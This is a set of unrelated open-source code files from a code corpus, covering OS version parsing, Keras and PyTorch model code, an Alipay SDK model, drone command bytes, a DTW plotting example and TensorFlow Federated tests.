repo_configuration.write(rendered.encode())
repo_configuration.flush()
output: bytes = subprocess.check_output([
'yum',
'--disableplugin=*',
'--installroot', repo_directory,
'-c', repo_configuration.name,
'--disablerepo=*',
'--enablerepo=temp',
'info', 'centos-release'
])
if b'Release' in output:
for line in output.split(b'\n'):
if line.startswith(b'Version'):
major: int = int(line.split(b'Version : ')[1])
self.major: int = major
elif line.startswith(b'Release'):
minor: int = int(line.split(b'Release : ')[1].split(b'.')[0])
self.minor: int = minor
break
else:
raise RuntimeError('Could not update OS version')
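# Hedged usage sketch (mirror URL illustrative; `is_remote` is provided by the
# RedHatFamily base class and is referenced in _update_version above):
#   distro = CentOs7("http://mirror.centos.org/centos/7/os/x86_64")
#   distro._update_version()  # shells out to yum and sets distro.major/.minor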
| 1.84375 | 2 |
train/mbnet_keras.py | andriyadi/StarWars-Chars-AIClassifier | 6 | 12759624 | import glob, os, random
import keras
import numpy as np
from keras import backend as K
from keras.optimizers import Adam
from keras.metrics import categorical_crossentropy
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing import image
from keras.models import Model
from keras.applications import imagenet_utils
from keras.layers import Dense, GlobalAveragePooling2D, Dropout
from keras.applications import MobileNet
from keras.applications.mobilenet import preprocess_input
import matplotlib.pyplot as plt
# Adjust these
NUM_CLASSES = 6
NAMES = ["cardboard", "glass", "metal", "paper", "plastic", "trash"]
IMAGE_WIDTH = 224
IMAGE_HEIGHT = 224
TRAINING_DIR = 'dataset/train'
VALIDATION_DIR = 'dataset/test'
img_list = glob.glob(os.path.join(TRAINING_DIR, '*/*.jpg'))
for i, img_path in enumerate(random.sample(img_list, 6)):
img = image.load_img(img_path, target_size=(224, 224))
img = image.img_to_array(img, dtype=np.uint8)
plt.subplot(2, 3, i+1)
    plt.imshow(img.squeeze())
plt.show()
base_model = keras.applications.mobilenet.MobileNet(
    input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, 3), alpha=0.75, depth_multiplier=1,
    dropout=0.001, include_top=False, weights="imagenet", classes=1000)
# Additional Layers
x=base_model.output
x=GlobalAveragePooling2D()(x)
x=Dense(128,activation='relu')(x) #we add dense layers so that the model can learn more complex functions and classify for better results.
x=Dropout(0.7)(x)
x=Dense(64, activation='relu')(x) #dense layer 3
preds=Dense(NUM_CLASSES, activation='softmax')(x) #final layer with softmax activation
model=Model(inputs=base_model.input,outputs=preds)
for i,layer in enumerate(model.layers):
print(i,layer.name)
# or if we want to set the first 20 layers of the network to be non-trainable
for layer in model.layers[:86]:
layer.trainable=False
for layer in model.layers[86:]:
layer.trainable=True
train_datagen=ImageDataGenerator(preprocessing_function=preprocess_input, validation_split=0.1) #included in our dependencies
# train_datagen = ImageDataGenerator( rescale = 1./255,
# rotation_range=45,
# width_shift_range=0.1,
# height_shift_range=0.1,
# shear_range=0.1,
# zoom_range=[0.9, 1.2],
# horizontal_flip=True,
# vertical_flip=False,
# fill_mode='constant',
# brightness_range=[0.7, 1.3])
train_generator=train_datagen.flow_from_directory(TRAINING_DIR,
target_size=(IMAGE_WIDTH,IMAGE_HEIGHT),
batch_size=16,
class_mode='categorical', subset='training',
seed=0
# save_to_dir='dataset/gen',
# save_prefix='gen-',
# save_format='jpeg'
)
validation_datagen = ImageDataGenerator(preprocessing_function=preprocess_input, validation_split=0.1)
# validation_datagen = ImageDataGenerator(rescale = 1./255,
# rotation_range=45,
# zoom_range=[0.9, 1.2],
# shear_range=0.1,)
validation_generator = validation_datagen.flow_from_directory(TRAINING_DIR,
target_size=(IMAGE_WIDTH,IMAGE_HEIGHT),
subset='validation', seed=0,
batch_size=16,
class_mode='categorical'
)
# model.summary()
model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])
# Adam optimizer, loss function will be categorical cross entropy, evaluation metric will be accuracy
step_size_train = (train_generator.n//train_generator.batch_size)
validation_steps = (validation_generator.n//validation_generator.batch_size)
model.fit_generator(generator=train_generator,
steps_per_epoch=step_size_train,
epochs=10,
#workers=4,
validation_data = validation_generator,
validation_steps = validation_steps,
verbose = 1)
model.save('garbageclassifier.h5')
#model.load_weights('logoclassifier.h5')
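# Hedged inference sketch (image path invented); mirrors the commented-out
# prepare_test_image helper below but indexes into the garbage-class NAMES:
# img = image.load_img('dataset/test/glass/glass1.jpg',
#                      target_size=(IMAGE_WIDTH, IMAGE_HEIGHT))
# x = preprocess_input(np.expand_dims(image.img_to_array(img), axis=0))
# pred = model.predict(x)
# print(NAMES[np.argmax(pred, axis=1)[0]])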
# def prepare_test_image(file):
# img_path = 'dataset/test/'
# img = image.load_img(img_path + file, target_size=(IMAGE_WIDTH, IMAGE_HEIGHT))
# img_array = image.img_to_array(img)
# img_array_expanded_dims = np.expand_dims(img_array, axis=0)
# return keras.applications.mobilenet.preprocess_input(img_array_expanded_dims)
# print("\n=========")
# preprocessed_image = prepare_test_image('01-dycodex/x0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Dycode {0:.2f}".format(predictions[0][0]*100))
# print("DycodeX {0:.2f}".format(predictions[0][1]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
# print("=========")
# preprocessed_image = prepare_test_image('02-adidas/a0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Adidas {0:.2f}".format(predictions[0][2]*100))
# print("DycodeX {0:.2f}".format(predictions[0][1]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
# print("=========")
# preprocessed_image = prepare_test_image('00-dycode/d0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Adidas {0:.2f}".format(predictions[0][2]*100))
# print("Dycode {0:.2f}".format(predictions[0][0]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
| 2.546875 | 3 |
nnrl/nn/modules/fully_connected.py | 0xangelo/nnrl | 0 | 12759625 | <reponame>0xangelo/nnrl<gh_stars>0
"""Neural network modules using fully connected hidden layers."""
from typing import Tuple
import torch
from torch import nn
from .linear import MaskedLinear
from .utils import get_activation
class FullyConnected(nn.Sequential):
"""Applies several fully connected modules to inputs."""
def __init__(
self,
in_features: int,
units: Tuple[int, ...] = (),
activation: str = None,
layer_norm: bool = False,
):
super().__init__()
self.in_features = in_features
activ = get_activation(activation)
units = (self.in_features,) + tuple(units)
modules = []
for in_dim, out_dim in zip(units[:-1], units[1:]):
modules.append(nn.Linear(in_dim, out_dim))
if layer_norm:
modules.append(nn.LayerNorm(out_dim))
if activ:
modules.append(activ())
self.out_features = units[-1]
self.sequential = nn.Sequential(*modules)
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
# pylint:disable=arguments-differ,missing-function-docstring
return self.sequential(inputs)
class StateActionEncoder(nn.Module):
"""Concatenates action after the first layer."""
__constants__ = {"in_features", "out_features"}
def __init__(
self,
obs_dim: int,
action_dim: int,
delay_action: bool = True,
units: Tuple[int, ...] = (),
**fc_kwargs
):
super().__init__()
self.in_features = obs_dim + action_dim
if units:
if delay_action is True:
self.obs_module = FullyConnected(obs_dim, units=units[:1], **fc_kwargs)
input_dim = units[0] + action_dim
units = units[1:]
else:
self.obs_module = nn.Identity()
input_dim = obs_dim + action_dim
self.sequential_module = FullyConnected(input_dim, units=units, **fc_kwargs)
self.out_features = self.sequential_module.out_features
else:
self.obs_module = nn.Identity()
self.sequential_module = nn.Identity()
self.out_features = obs_dim + action_dim
def forward(self, obs: torch.Tensor, actions: torch.Tensor) -> torch.Tensor:
# pylint:disable=arguments-differ,missing-function-docstring
output = self.obs_module(obs)
output = torch.cat([output, actions], dim=-1)
output = self.sequential_module(output)
return output
class MADE(nn.Module):
"""MADE: Masked Autoencoder for Distribution Estimation
Implements a Masked Autoregressive MLP, where carefully constructed
binary masks over weights ensure the autoregressive property.
Based on: https://github.com/karpathy/pytorch-made
Args:
in_features: number of inputs
hidden sizes: number of units in hidden layers
out_features: number of outputs, which usually collectively parameterize
some kind of 1D distribution
natural_ordering: force natural ordering of dimensions,
don't use random permutations
Note: if out_features is e.g. 2x larger than `in_features` (perhaps the mean
and std), then the first `in_features` outputs will be all the means and
the remaining will be stds. I.e. output dimensions depend on the same
input dimensions in "chunks" and should be carefully decoded downstream.
"""
# pylint:disable=too-many-instance-attributes
def __init__(
self,
in_features: int,
units: Tuple[int, ...],
out_features: int,
natural_ordering: bool = False,
):
# pylint:disable=too-many-arguments
super().__init__()
self.in_features = in_features
self.out_features = out_features
assert (
self.out_features % self.in_features == 0
), "out_features must be integer multiple of in_features"
# define a simple MLP neural net
sizes = [in_features] + list(units) + [out_features]
# define input units ids
ids = [torch.arange(sizes[0]) if natural_ordering else torch.randperm(sizes[0])]
# define hidden units ids
for idx, size in enumerate(sizes[1:-1]):
ids.append(torch.randint(ids[idx].min().item(), out_features - 1, (size,)))
# copy output units ids from input units ids
ids.append(torch.cat([ids[0]] * (out_features // in_features), dim=-1))
# define masks for each layer
masks = [m.unsqueeze(-1) >= n.unsqueeze(0) for m, n in zip(ids[1:-1], ids[:-2])]
# last layer has a different connection pattern
masks.append(ids[-1].unsqueeze(-1) > ids[-2].unsqueeze(0))
linears = [MaskedLinear(hin, hout) for hin, hout in zip(sizes[:-1], sizes[1:])]
for linear, mask in zip(linears, masks):
linear.set_mask(mask)
layers = [m for layer in linears[:-1] for m in (layer, nn.LeakyReLU(0.2))]
layers += linears[-1:]
self.net = nn.Sequential(*layers)
def forward(self, inputs):
# pylint:disable=arguments-differ,missing-function-docstring
return self.net(inputs)
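# Hedged usage sketch (dimensions invented): out_features must be an integer
# multiple of in_features, and each size-in_features chunk of the output
# depends autoregressively on the (randomly permuted) inputs.
#   made = MADE(in_features=3, units=(16, 16), out_features=6)
#   made(torch.randn(5, 3)).shape  # -> torch.Size([5, 6])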
| 2.625 | 3 |
exercicios/aula8-ex016.py | anildoferreira/CursoPython-PyCharm | 0 | 12759626 | <reponame>anildoferreira/CursoPython-PyCharm<filename>exercicios/aula8-ex016.py
'''from math import trunc
num = float(input('Enter a number to show its integer portion: '))
print('The integer portion of your number is: {}'.format(trunc(num)))'''
num = float(input('Enter a number to turn into an integer on its own: '))
print('The floating-point number {} became the integer {:.0f}'.format(num, int(num)))
| 3.484375 | 3 |
alipay/aop/api/domain/KoubeiMerchantOperatorModifyModel.py | articuly/alipay-sdk-python-all | 0 | 12759627 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantOperatorModifyModel(object):
def __init__(self):
self._auth_code = None
self._department_id = None
self._discount_limit_unit = None
self._discount_limit_value = None
self._free_limit_unit = None
self._free_limit_value = None
self._gender = None
self._job_type = None
self._mobile = None
self._operator_id = None
self._operator_name = None
self._role_id = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
@property
def department_id(self):
return self._department_id
@department_id.setter
def department_id(self, value):
self._department_id = value
@property
def discount_limit_unit(self):
return self._discount_limit_unit
@discount_limit_unit.setter
def discount_limit_unit(self, value):
self._discount_limit_unit = value
@property
def discount_limit_value(self):
return self._discount_limit_value
@discount_limit_value.setter
def discount_limit_value(self, value):
self._discount_limit_value = value
@property
def free_limit_unit(self):
return self._free_limit_unit
@free_limit_unit.setter
def free_limit_unit(self, value):
self._free_limit_unit = value
@property
def free_limit_value(self):
return self._free_limit_value
@free_limit_value.setter
def free_limit_value(self, value):
self._free_limit_value = value
@property
def gender(self):
return self._gender
@gender.setter
def gender(self, value):
self._gender = value
@property
def job_type(self):
return self._job_type
@job_type.setter
def job_type(self, value):
self._job_type = value
@property
def mobile(self):
return self._mobile
@mobile.setter
def mobile(self, value):
self._mobile = value
@property
def operator_id(self):
return self._operator_id
@operator_id.setter
def operator_id(self, value):
self._operator_id = value
@property
def operator_name(self):
return self._operator_name
@operator_name.setter
def operator_name(self, value):
self._operator_name = value
@property
def role_id(self):
return self._role_id
@role_id.setter
def role_id(self, value):
self._role_id = value
def to_alipay_dict(self):
params = dict()
if self.auth_code:
if hasattr(self.auth_code, 'to_alipay_dict'):
params['auth_code'] = self.auth_code.to_alipay_dict()
else:
params['auth_code'] = self.auth_code
if self.department_id:
if hasattr(self.department_id, 'to_alipay_dict'):
params['department_id'] = self.department_id.to_alipay_dict()
else:
params['department_id'] = self.department_id
if self.discount_limit_unit:
if hasattr(self.discount_limit_unit, 'to_alipay_dict'):
params['discount_limit_unit'] = self.discount_limit_unit.to_alipay_dict()
else:
params['discount_limit_unit'] = self.discount_limit_unit
if self.discount_limit_value:
if hasattr(self.discount_limit_value, 'to_alipay_dict'):
params['discount_limit_value'] = self.discount_limit_value.to_alipay_dict()
else:
params['discount_limit_value'] = self.discount_limit_value
if self.free_limit_unit:
if hasattr(self.free_limit_unit, 'to_alipay_dict'):
params['free_limit_unit'] = self.free_limit_unit.to_alipay_dict()
else:
params['free_limit_unit'] = self.free_limit_unit
if self.free_limit_value:
if hasattr(self.free_limit_value, 'to_alipay_dict'):
params['free_limit_value'] = self.free_limit_value.to_alipay_dict()
else:
params['free_limit_value'] = self.free_limit_value
if self.gender:
if hasattr(self.gender, 'to_alipay_dict'):
params['gender'] = self.gender.to_alipay_dict()
else:
params['gender'] = self.gender
if self.job_type:
if hasattr(self.job_type, 'to_alipay_dict'):
params['job_type'] = self.job_type.to_alipay_dict()
else:
params['job_type'] = self.job_type
if self.mobile:
if hasattr(self.mobile, 'to_alipay_dict'):
params['mobile'] = self.mobile.to_alipay_dict()
else:
params['mobile'] = self.mobile
if self.operator_id:
if hasattr(self.operator_id, 'to_alipay_dict'):
params['operator_id'] = self.operator_id.to_alipay_dict()
else:
params['operator_id'] = self.operator_id
if self.operator_name:
if hasattr(self.operator_name, 'to_alipay_dict'):
params['operator_name'] = self.operator_name.to_alipay_dict()
else:
params['operator_name'] = self.operator_name
if self.role_id:
if hasattr(self.role_id, 'to_alipay_dict'):
params['role_id'] = self.role_id.to_alipay_dict()
else:
params['role_id'] = self.role_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMerchantOperatorModifyModel()
if 'auth_code' in d:
o.auth_code = d['auth_code']
if 'department_id' in d:
o.department_id = d['department_id']
if 'discount_limit_unit' in d:
o.discount_limit_unit = d['discount_limit_unit']
if 'discount_limit_value' in d:
o.discount_limit_value = d['discount_limit_value']
if 'free_limit_unit' in d:
o.free_limit_unit = d['free_limit_unit']
if 'free_limit_value' in d:
o.free_limit_value = d['free_limit_value']
if 'gender' in d:
o.gender = d['gender']
if 'job_type' in d:
o.job_type = d['job_type']
if 'mobile' in d:
o.mobile = d['mobile']
if 'operator_id' in d:
o.operator_id = d['operator_id']
if 'operator_name' in d:
o.operator_name = d['operator_name']
if 'role_id' in d:
o.role_id = d['role_id']
return o
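# Hedged round-trip sketch (values invented):
#   model = KoubeiMerchantOperatorModifyModel.from_alipay_dict(
#       {"operator_id": "op_001", "role_id": "cashier"})
#   model.to_alipay_dict()  # -> {"operator_id": "op_001", "role_id": "cashier"}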
| 1.828125 | 2 |
syma/__init__.py | rooterkyberian/syma | 3 | 12759628 | import operator
from functools import reduce
MSG_LEN = 27
IDLE = bytes.fromhex("436d640001001200010404000a000000808080802020202000550f")
CMD_PREFIX = IDLE[:-11]
def _c(cmd: str) -> bytes:
data = bytes.fromhex(cmd)
assert len(data) == MSG_LEN - len(CMD_PREFIX)
return CMD_PREFIX + data
def checksum(msg: bytes) -> bytes:
    """Two check bytes over the first MSG_LEN - 2 bytes of a frame: an XOR
    fold seeded with 0xB9, then an additive sum folded into one byte."""
    msg = msg[: MSG_LEN - 2]
    b9 = reduce(operator.xor, msg, 0xB9) & 0xFF
    b10 = reduce(operator.add, msg, b9) & 0xFF
    return bytes((b9, b10))
class SymaMSGs:
INIT = b"\x00"
IDLE = _c("808080802020202000550f")
POWER_TOGGLE = _c("808080802020202010652f")
LAND = _c("8080808020202020085d1f")
LIFT = _c("808080802020206000958f")
CALIBRATE = _c("808080802020202020754f")
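if __name__ == "__main__":
    # Sanity sketch: every full command frame above (INIT aside) is MSG_LEN
    # bytes long and shares the 16-byte CMD_PREFIX.
    for name in ("IDLE", "POWER_TOGGLE", "LAND", "LIFT", "CALIBRATE"):
        frame = getattr(SymaMSGs, name)
        assert len(frame) == MSG_LEN and frame.startswith(CMD_PREFIX)
        print(name, frame.hex())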
| 2.828125 | 3 |
examples/metrics/plot_dtw.py | jmrichardson/pyts | 0 | 12759629 | <gh_stars>0
"""
====================
Dynamic Time Warping
====================
This example shows how to compute and visualize the optimal path
when computing Dynamic Time Warping (DTW) between two time series and
compare the results with different variants of DTW. It is implemented
as :func:`pyts.metrics.dtw`.
"""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
import matplotlib.pyplot as plt
from pyts.datasets import load_gunpoint
from pyts.metrics import dtw, itakura_parallelogram, sakoe_chiba_band
from pyts.metrics.dtw import (cost_matrix, accumulated_cost_matrix,
_return_path, _blurred_path_region)
# Parameters
X, _, _, _ = load_gunpoint(return_X_y=True)
x, y = X[0], X[1]
# To compare time series of different lengths, we remove some observations
mask = np.ones(x.size)
mask[::5] = 0
y = y[mask.astype(bool)]
n_timestamps_1, n_timestamps_2 = x.size, y.size
plt.figure(figsize=(10, 8))
timestamps_1 = np.arange(n_timestamps_1 + 1)
timestamps_2 = np.arange(n_timestamps_2 + 1)
# Dynamic Time Warping: classic
dtw_classic, path_classic = dtw(x, y, dist='square',
method='classic', return_path=True)
matrix_classic = np.zeros((n_timestamps_2 + 1, n_timestamps_1 + 1))
matrix_classic[tuple(path_classic)[::-1]] = 1.
plt.subplot(2, 2, 1)
plt.pcolor(timestamps_1, timestamps_2, matrix_classic,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('classic', dtw_classic),
fontsize=14)
# Dynamic Time Warping: sakoechiba
window_size = 0.1
dtw_sakoechiba, path_sakoechiba = dtw(
x, y, dist='square', method='sakoechiba',
options={'window_size': window_size}, return_path=True
)
band = sakoe_chiba_band(n_timestamps_1, n_timestamps_2,
window_size=window_size)
matrix_sakoechiba = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_sakoechiba[i, np.arange(*band[:, i])] = 0.5
matrix_sakoechiba[tuple(path_sakoechiba)] = 1.
plt.subplot(2, 2, 2)
plt.pcolor(timestamps_1, timestamps_2, matrix_sakoechiba.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('sakoechiba', dtw_sakoechiba),
fontsize=14)
# Dynamic Time Warping: itakura
slope = 1.2
dtw_itakura, path_itakura = dtw(
x, y, dist='square', method='itakura',
options={'max_slope': slope}, return_path=True
)
parallelogram = itakura_parallelogram(n_timestamps_1, n_timestamps_2,
max_slope=slope)
matrix_itakura = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_itakura[i, np.arange(*parallelogram[:, i])] = 0.5
matrix_itakura[tuple(path_itakura)] = 1.
plt.subplot(2, 2, 3)
plt.pcolor(timestamps_1, timestamps_2, matrix_itakura.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('itakura', dtw_itakura),
fontsize=14)
# Dynamic Time Warping: multiscale
resolution, radius = 5, 2
dtw_multiscale, path_multiscale = dtw(
x, y, dist='square', method='multiscale',
options={'resolution': resolution, 'radius': radius}, return_path=True
)
x_padded = x.reshape(-1, resolution).mean(axis=1)
y_padded = y.reshape(-1, resolution).mean(axis=1)
cost_mat_res = cost_matrix(x_padded, y_padded, dist='square', region=None)
acc_cost_mat_res = accumulated_cost_matrix(cost_mat_res)
path_res = _return_path(acc_cost_mat_res)
multiscale_region = _blurred_path_region(
n_timestamps_1, n_timestamps_2, resolution, x_padded.size, y_padded.size,
path_res,
radius=radius
)
matrix_multiscale = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_multiscale[i, np.arange(*multiscale_region[:, i])] = 0.5
matrix_multiscale[tuple(path_multiscale)] = 1.
plt.subplot(2, 2, 4)
plt.pcolor(timestamps_1, timestamps_2, matrix_multiscale.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('multiscale', dtw_multiscale),
fontsize=14)
plt.suptitle("Dynamic Time Warping", y=0.995, fontsize=17)
plt.subplots_adjust(top=0.91, hspace=0.4)
plt.show()
| 2.703125 | 3 |
tensorflow_federated/python/core/templates/estimation_process_test.py | j35tor/federated | 1 | 12759630 | <filename>tensorflow_federated/python/core/templates/estimation_process_test.py
# Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.api import intrinsics
from tensorflow_federated.python.core.api import placements
from tensorflow_federated.python.core.api import test_case
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import estimation_process
@computations.tf_computation()
def test_initialize_fn():
return tf.constant(0, tf.int32)
@computations.tf_computation(tf.int32)
def test_next_fn(state):
return state
@computations.tf_computation(tf.int32)
def test_report_fn(state):
return tf.cast(state, tf.float32)
@computations.tf_computation(tf.float32)
def test_map_fn(estimate):
return tf.stack([estimate, estimate])
class EstimationProcessTest(test_case.TestCase):
def test_construction_does_not_raise(self):
try:
estimation_process.EstimationProcess(test_initialize_fn, test_next_fn,
test_report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct a valid EstimationProcess.')
def test_construction_with_empty_state_does_not_raise(self):
initialize_fn = computations.tf_computation()(lambda: ())
next_fn = computations.tf_computation(())(lambda x: (x, 1.0))
report_fn = computations.tf_computation(())(lambda x: x)
try:
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an EstimationProcess with empty state.')
def test_construction_with_unknown_dimension_does_not_raise(self):
initialize_fn = computations.tf_computation()(
lambda: tf.constant([], dtype=tf.string))
@computations.tf_computation(
computation_types.TensorType(shape=[None], dtype=tf.string))
def next_fn(strings):
return tf.concat([strings, tf.constant(['abc'])], axis=0)
@computations.tf_computation(
computation_types.TensorType(shape=[None], dtype=tf.string))
def report_fn(strings):
return strings
try:
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an EstimationProcess with parameter types '
'with statically unknown shape.')
def test_init_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=lambda: 0,
next_fn=test_next_fn,
report_fn=test_report_fn)
def test_next_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=test_initialize_fn,
next_fn=lambda state: state,
report_fn=test_report_fn)
def test_report_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=test_initialize_fn,
next_fn=test_next_fn,
report_fn=lambda state: state)
def test_init_param_not_empty_raises(self):
one_arg_initialize_fn = computations.tf_computation(tf.int32)(lambda x: x)
with self.assertRaises(errors.TemplateInitFnParamNotEmptyError):
estimation_process.EstimationProcess(one_arg_initialize_fn, test_next_fn,
test_report_fn)
def test_init_state_not_assignable(self):
float_initialize_fn = computations.tf_computation()(lambda: 0.0)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(float_initialize_fn, test_next_fn,
test_report_fn)
def test_federated_init_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_next_state_not_assignable(self):
float_next_fn = computations.tf_computation(
tf.float32)(lambda state: tf.cast(state, tf.float32))
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, float_next_fn,
test_report_fn)
def test_federated_next_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
intrinsics.federated_broadcast)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_next_state_not_assignable_tuple_result(self):
float_next_fn = computations.tf_computation(
tf.float32,
tf.float32)(lambda state, x: (tf.cast(state, tf.float32), x))
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, float_next_fn,
test_report_fn)
# Tests specific only for the EstimationProcess contract below.
def test_report_state_not_assignable(self):
report_fn = computations.tf_computation(
tf.float32)(lambda estimate: estimate)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, test_next_fn,
report_fn)
def test_federated_report_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_mapped_process_as_expected(self):
process = estimation_process.EstimationProcess(test_initialize_fn,
test_next_fn, test_report_fn)
mapped_process = process.map(test_map_fn)
self.assertIsInstance(mapped_process, estimation_process.EstimationProcess)
self.assertEqual(process.initialize, mapped_process.initialize)
self.assertEqual(process.next, mapped_process.next)
self.assertEqual(process.report.type_signature.parameter,
mapped_process.report.type_signature.parameter)
self.assertEqual(test_map_fn.type_signature.result,
mapped_process.report.type_signature.result)
def test_federated_mapped_process_as_expected(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
lambda state: intrinsics.federated_map(test_report_fn, state))
process = estimation_process.EstimationProcess(initialize_fn, next_fn,
report_fn)
map_fn = computations.federated_computation(
report_fn.type_signature.result)(
lambda estimate: intrinsics.federated_map(test_map_fn, estimate))
mapped_process = process.map(map_fn)
self.assertIsInstance(mapped_process, estimation_process.EstimationProcess)
self.assertEqual(process.initialize, mapped_process.initialize)
self.assertEqual(process.next, mapped_process.next)
self.assertEqual(process.report.type_signature.parameter,
mapped_process.report.type_signature.parameter)
self.assertEqual(map_fn.type_signature.result,
mapped_process.report.type_signature.result)
def test_map_estimate_not_assignable(self):
map_fn = computations.tf_computation(tf.int32)(lambda estimate: estimate)
process = estimation_process.EstimationProcess(test_initialize_fn,
test_next_fn, test_report_fn)
with self.assertRaises(estimation_process.EstimateNotAssignableError):
process.map(map_fn)
def test_federated_map_estimate_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
lambda state: intrinsics.federated_map(test_report_fn, state))
process = estimation_process.EstimationProcess(initialize_fn, next_fn,
report_fn)
map_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda estimate: estimate)
with self.assertRaises(estimation_process.EstimateNotAssignableError):
process.map(map_fn)
if __name__ == '__main__':
test_case.main()
| 1.75 | 2 |
fixture/main.py | Cpt-Meow/PAT | 0 | 12759631 | <reponame>Cpt-Meow/PAT
class MainClass:
class_number = 20
class_string = 'Hello, world'
def get_local_number(self):
return 14
    def get_class_number(self):
return MainClass.class_number
def get_class_string(self):
return MainClass.class_string
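# Illustrative usage (not part of the original fixture):
if __name__ == '__main__':
    obj = MainClass()
    print(obj.get_local_number())   # -> 14
    print(obj.get_class_number())   # -> 20
    print(obj.get_class_string())   # -> Hello, world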
| 2.171875 | 2 |
bin/uresnet.py | NuTufts/uresnet_pytorch | 3 | 12759632 | <filename>bin/uresnet.py
#!/usr/bin/python
import os
import sys
URESNET_DIR = os.path.dirname(os.path.abspath(__file__))
URESNET_DIR = os.path.dirname(URESNET_DIR)
sys.path.insert(0, URESNET_DIR)
from uresnet.flags import URESNET_FLAGS
def main():
flags = URESNET_FLAGS()
flags.parse_args()
if __name__ == '__main__':
main()
| 2.234375 | 2 |
src/news_posts/migrations/0001_initial.py | Zencrazycat/news_board | 0 | 12759633 | <filename>src/news_posts/migrations/0001_initial.py
# Generated by Django 2.2.10 on 2020-05-29 06:33
from django.db import migrations, models
import django.db.models.deletion
